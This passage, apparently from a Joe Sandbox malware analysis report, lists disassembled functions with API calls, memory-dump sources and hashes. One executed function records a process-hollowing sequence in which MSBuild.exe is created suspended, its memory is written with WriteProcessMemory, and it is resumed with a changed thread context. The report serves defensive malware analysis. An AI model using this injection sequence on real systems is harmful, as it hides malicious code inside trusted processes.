                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: 2d395fef6bf6d2161f205ad2dbd11117f8f32b2c6da05af5b4328dea44ce9941
                                                                                                                                                                                                • Instruction ID: 3310c1828c3285645545448557106d8231fd07a85248cb85d2ce5c62d1292771
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2d395fef6bf6d2161f205ad2dbd11117f8f32b2c6da05af5b4328dea44ce9941
                                                                                                                                                                                                • Instruction Fuzzy Hash: 53418A6761C6C486CB798B21A050BEEBBB9F3C6784F45D007DACD53B1ACE39D8848B41
                                                                                                                                                                                                Function 00956B58 Relevance: 5.1, APIs: 4, Instructions: 99COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: 87ddd31ae5fda347235228c36177d9caa1af38e3f2d78a0fbcc62b30e0d1f058
                                                                                                                                                                                                • Instruction ID: 3d66a3597c3fabac7f42295a9ec19c3a24854c87137140af46c38bad06dd116f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 87ddd31ae5fda347235228c36177d9caa1af38e3f2d78a0fbcc62b30e0d1f058
                                                                                                                                                                                                • Instruction Fuzzy Hash: D731F27361568086CB24DF2AE8407AA3764F7C8BE5F984226EFEA47794DB34C846C700
                                                                                                                                                                                                Function 0096A034 Relevance: 5.1, APIs: 4, Instructions: 81COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$memmove
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1534225298-0
                                                                                                                                                                                                • Opcode ID: 67c0837a8ac08b8e7b81d59f219567057fac08a4c31a6893a672a0fe60d58eed
                                                                                                                                                                                                • Instruction ID: b035f70287d98399d6666225e9dd165edfe23fdb841aaa4ab479906c6ba4692f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 67c0837a8ac08b8e7b81d59f219567057fac08a4c31a6893a672a0fe60d58eed
                                                                                                                                                                                                • Instruction Fuzzy Hash: A5210833205B8085DB15AF36EC557296398BF86B94F6D8124EF591B381DF78C881C712
                                                                                                                                                                                                Function 00944B58 Relevance: 5.1, APIs: 4, Instructions: 80COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$memmove
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1534225298-0
                                                                                                                                                                                                • Opcode ID: 7b8be88fbbd6b5478f1b8fe33e7292913211728ee70c3487ba27a43df7afdd97
                                                                                                                                                                                                • Instruction ID: 3551445eafcf746ed1cad1cc41589b258a739d61d2471e2af3d4b0eb264cf9c0
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7b8be88fbbd6b5478f1b8fe33e7292913211728ee70c3487ba27a43df7afdd97
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8A21B237612A9486CB21EF26D410B2DB365F784FE9B188224EE6D0B398DF38C842C350
                                                                                                                                                                                                Function 00957780 Relevance: 5.1, APIs: 4, Instructions: 66COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • EnterCriticalSection.KERNEL32 ref: 0095779B
                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32 ref: 009577A7
                                                                                                                                                                                                • EnterCriticalSection.KERNEL32 ref: 0095783C
                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32 ref: 00957848
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3168844106-0
                                                                                                                                                                                                • Opcode ID: 905f98d841eae4ab66d526709c79df53eb5328ecb6ed6fba7ada2edbd53a37aa
                                                                                                                                                                                                • Instruction ID: 0135a3624a521053e4f9e8c11c7edd5fb330d35c9bf49e1a27044e9e9359b705
                                                                                                                                                                                                • Opcode Fuzzy Hash: 905f98d841eae4ab66d526709c79df53eb5328ecb6ed6fba7ada2edbd53a37aa
                                                                                                                                                                                                • Instruction Fuzzy Hash: EE214326304B40A7CB20DF2AE89425873B0FB49B99F285122EF4E47B11DF38D9A8C700
                                                                                                                                                                                                Function 0096E7A0 Relevance: 5.1, APIs: 4, Instructions: 57COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$ExceptionThrowmalloc
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2043655614-0
                                                                                                                                                                                                • Opcode ID: 85820a4b7cfbf62d825ef575ed64e4517ae2fd90292bd41fdaee0927cf1864a6
                                                                                                                                                                                                • Instruction ID: 8698c24541f67eeb92d6186498ac07fafbc058194f78a0fbb67933bb415bd8ca
                                                                                                                                                                                                • Opcode Fuzzy Hash: 85820a4b7cfbf62d825ef575ed64e4517ae2fd90292bd41fdaee0927cf1864a6
                                                                                                                                                                                                • Instruction Fuzzy Hash: B811B472215B8082CB24DF35E84171D73A5FBC9BE0F608226AB9D077A8EF38C895C744
                                                                                                                                                                                                Function 009875A4 Relevance: 5.1, APIs: 4, Instructions: 54COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcmp
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1475443563-0
                                                                                                                                                                                                • Opcode ID: 26e0d05632ee771259b6d8779e1bb14a2af1a10e0c5519a103b38d64912a3de7
                                                                                                                                                                                                • Instruction ID: 36756bfe4ecc3a09b41cc1a45bae4eb37cc7fb91f893888c92f69d0ae78c3b13
                                                                                                                                                                                                • Opcode Fuzzy Hash: 26e0d05632ee771259b6d8779e1bb14a2af1a10e0c5519a103b38d64912a3de7
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2F01F1B230DB4185EB04AFAA9C653A862599B89FC4F984434DE068B306FF38CA46C310
                                                                                                                                                                                                Function 0096C8E8 Relevance: 5.1, APIs: 4, Instructions: 54COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcmp
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1475443563-0
                                                                                                                                                                                                • Opcode ID: ebbf41f14a031a46e4a55ff2dc776043666cb55a5837aa6e1a48b56d902b4385
                                                                                                                                                                                                • Instruction ID: 5b5c07ea4fbe6e0072a91b2f36d0de2322bc072eb7d8dc5c2acfc8750e747a88
                                                                                                                                                                                                • Opcode Fuzzy Hash: ebbf41f14a031a46e4a55ff2dc776043666cb55a5837aa6e1a48b56d902b4385
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5501B1F230974141EB04AF26AD653B822699B4AFD4F888425EE499B306EF78CE55C304
                                                                                                                                                                                                Function 00953A0C Relevance: 5.1, APIs: 4, Instructions: 54COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcmp
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1475443563-0
                                                                                                                                                                                                • Opcode ID: fea3fd7b45b55f817435c8431d97fe1bf12a638175959c43ee92c8fc165712c7
                                                                                                                                                                                                • Instruction ID: be216857d350509e6b5ccbbe3eb48905c8e1e8472f9632e9e29e0ced212d9f47
                                                                                                                                                                                                • Opcode Fuzzy Hash: fea3fd7b45b55f817435c8431d97fe1bf12a638175959c43ee92c8fc165712c7
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D0192A230974151EF04DB279D653A433299B89FD5F84D4259E4A87306FF78CE4AC304
                                                                                                                                                                                                Function 0096CE98 Relevance: 5.1, APIs: 4, Instructions: 54COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcmp
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1475443563-0
                                                                                                                                                                                                • Opcode ID: 3300147bea888004f54cd18b7a1711a170f8e79cb67e40ec15571cdf7fcd0c60
                                                                                                                                                                                                • Instruction ID: a2e4bc53d1225ed8e0ae81d9dabead88390b7de2b5107d00bae9dd74e385adc2
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3300147bea888004f54cd18b7a1711a170f8e79cb67e40ec15571cdf7fcd0c60
                                                                                                                                                                                                • Instruction Fuzzy Hash: F701B5F230974191EB04EF2A9C653B463269B59FD4FC48425EE4987706EF38CE46C304
                                                                                                                                                                                                Function 0094538C Relevance: 5.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: ea9aa8451205e714d2d2deee7ad544f8e48fe2026ff0a9e62e11d2d899170449
                                                                                                                                                                                                • Instruction ID: 15b826dfc7c1e79b5e6f3d431541dce9dbef9b2196a79ad5631246b26bd0c917
                                                                                                                                                                                                • Opcode Fuzzy Hash: ea9aa8451205e714d2d2deee7ad544f8e48fe2026ff0a9e62e11d2d899170449
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F017563714DD4C69525BE97DC90E2A6618BB55FE971E4215FF290B751DF60C883C300
                                                                                                                                                                                                Function 00961474 Relevance: 5.0, APIs: 4, Instructions: 35COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: efa2551094f8694e9312fa94f2ef5c0b0e1a7981b61eb5219889216caf8af953
                                                                                                                                                                                                • Instruction ID: 1759655929faeb46d7e7b04d71911d8f47264d8ff025f1d905cce7193be461d1
                                                                                                                                                                                                • Opcode Fuzzy Hash: efa2551094f8694e9312fa94f2ef5c0b0e1a7981b61eb5219889216caf8af953
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5EF082537159D489CA14EF27DC91A682368BF9AFE8B5C4171FF1D0B754EE20CC928300
                                                                                                                                                                                                Function 00987968 Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: d981d276683500439fe255ece07c6d20aa2690fecfcea96cff91bf552de1cfa0
                                                                                                                                                                                                • Instruction ID: b7ab4999fbb078767d20a56d10445c6aba211c3cd6ff978c60ce3f92936de988
                                                                                                                                                                                                • Opcode Fuzzy Hash: d981d276683500439fe255ece07c6d20aa2690fecfcea96cff91bf552de1cfa0
                                                                                                                                                                                                • Instruction Fuzzy Hash: 47F0BE13B099C08A8A14BF67EC90668A364BF8ABA475C0531FF1D0BB44DE20C8A28300
                                                                                                                                                                                                Function 00960BBC Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: fffe1feea4d5eb521afbbdfec112adb7fa227329f3f82f7615eed68f37e3b42c
                                                                                                                                                                                                • Instruction ID: 9c3f3851072737ffc7c65277b658b1446e6de3b8916854487010977511cb0a45
                                                                                                                                                                                                • Opcode Fuzzy Hash: fffe1feea4d5eb521afbbdfec112adb7fa227329f3f82f7615eed68f37e3b42c
                                                                                                                                                                                                • Instruction Fuzzy Hash: F4F08223B068C489CB15AF36DC916696364BFD9FE9B5D8261FF2D0B355DE34C8828300

                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                Function 00D4E1A9 Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 295threadinjectionmemoryCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00D4E11B,00D4E10B), ref: 00D4E33F
                                                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00D4E352
                                                                                                                                                                                                • Wow64GetThreadContext.KERNEL32(00000098,00000000), ref: 00D4E370
                                                                                                                                                                                                • ReadProcessMemory.KERNELBASE(00000094,?,00D4E15F,00000004,00000000), ref: 00D4E394
                                                                                                                                                                                                • VirtualAllocEx.KERNELBASE(00000094,?,?,00003000,00000040), ref: 00D4E3BF
                                                                                                                                                                                                • WriteProcessMemory.KERNELBASE(00000094,00000000,?,?,00000000,?), ref: 00D4E417
                                                                                                                                                                                                • WriteProcessMemory.KERNELBASE(00000094,00400000,?,?,00000000,?,00000028), ref: 00D4E462
                                                                                                                                                                                                • WriteProcessMemory.KERNELBASE(00000094,?,?,00000004,00000000), ref: 00D4E4A0
                                                                                                                                                                                                • Wow64SetThreadContext.KERNEL32(00000098,00520000), ref: 00D4E4DC
                                                                                                                                                                                                • ResumeThread.KERNELBASE(00000098), ref: 00D4E4EB
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001F.00000002.2706480899.0000000000D4E000.00000040.00000001.01000000.00000011.sdmp, Offset: 00D30000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001F.00000002.2703746142.0000000000D30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2704400368.0000000000D31000.00000020.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2705213247.0000000000D46000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2707415666.0000000000D4F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2708269704.0000000000D51000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2714355102.0000000000D53000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_31_2_d30000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                                                                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                                                                                                                                • API String ID: 2687962208-3857624555
                                                                                                                                                                                                • Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                                                                                                                • Instruction ID: e445e107ad4478106815d14acbc9eec3bf603376c26d621dcc4c5158c62f01df
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4DB1097664064AAFDB60CF68CC80BDA73A5FF88714F158124EA0CAB341D774FA51CBA4
                                                                                                                                                                                                Function 00D317D0 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 293fileCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 74 d317d0-d31851 GetPEB call d31000 CreateFileA 77 d31857-d31865 GetFileSize 74->77 78 d31b3b-d31b4e 74->78 79 d3186b-d3188d call d323b0 ReadFile 77->79 80 d31b1e-d31b26 CloseHandle 77->80 83 d31893-d318c1 CloseHandle 79->83 84 d31b28-d31b35 call d323b9 CloseHandle 79->84 80->78 86 d318d8-d318de 83->86 84->78 88 d31b06-d31b14 call d31710 86->88 89 d318e4-d31901 call d38510 86->89 92 d31b19-d31b1c 88->92 94 d31907-d3190c 89->94 95 d31b4f-d31b57 call d320c0 89->95 92->78 96 d31930-d31953 94->96 97 d3190e-d3192e call d347b0 94->97 102 d31b5c-d31b87 call d38026 call d323b9 95->102 100 d31970-d3197c call d3234a 96->100 101 d31955-d3196c call d3234a 96->101 107 d3199d-d319c9 97->107 112 d3197e-d3199b call d347b0 100->112 101->112 113 d31a44-d31a54 107->113 114 d319cb-d319d3 107->114 112->107 116 d31a56-d31a59 113->116 117 d31a74-d31a81 113->117 119 d31a21-d31a25 114->119 120 d319d5-d319da 114->120 123 d31a5b-d31a5e 116->123 124 d31a69-d31a72 116->124 125 d31a83-d31a89 117->125 119->113 122 d31a27-d31a42 119->122 121 d319e0-d31a1f 120->121 121->119 121->121 122->113 123->125 127 d31a60-d31a66 123->127 124->117 128 d31a8b-d31a94 125->128 129 d31ace-d31ae8 125->129 127->124 132 d31ac0 128->132 133 d31a96-d31aa5 128->133 130 d318d0-d318d7 129->130 131 d31aee-d31b01 129->131 130->86 131->130 135 d31ac3-d31acb call d3237f 132->135 133->102 134 d31aab-d31ab1 133->134 134->135 135->129
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00D31000: _strlen.LIBCMT ref: 00D3108D
                                                                                                                                                                                                • CreateFileA.KERNELBASE ref: 00D3184C
                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00D3185C
                                                                                                                                                                                                • ReadFile.KERNELBASE(00000000,?,00000000,?,00000000), ref: 00D31885
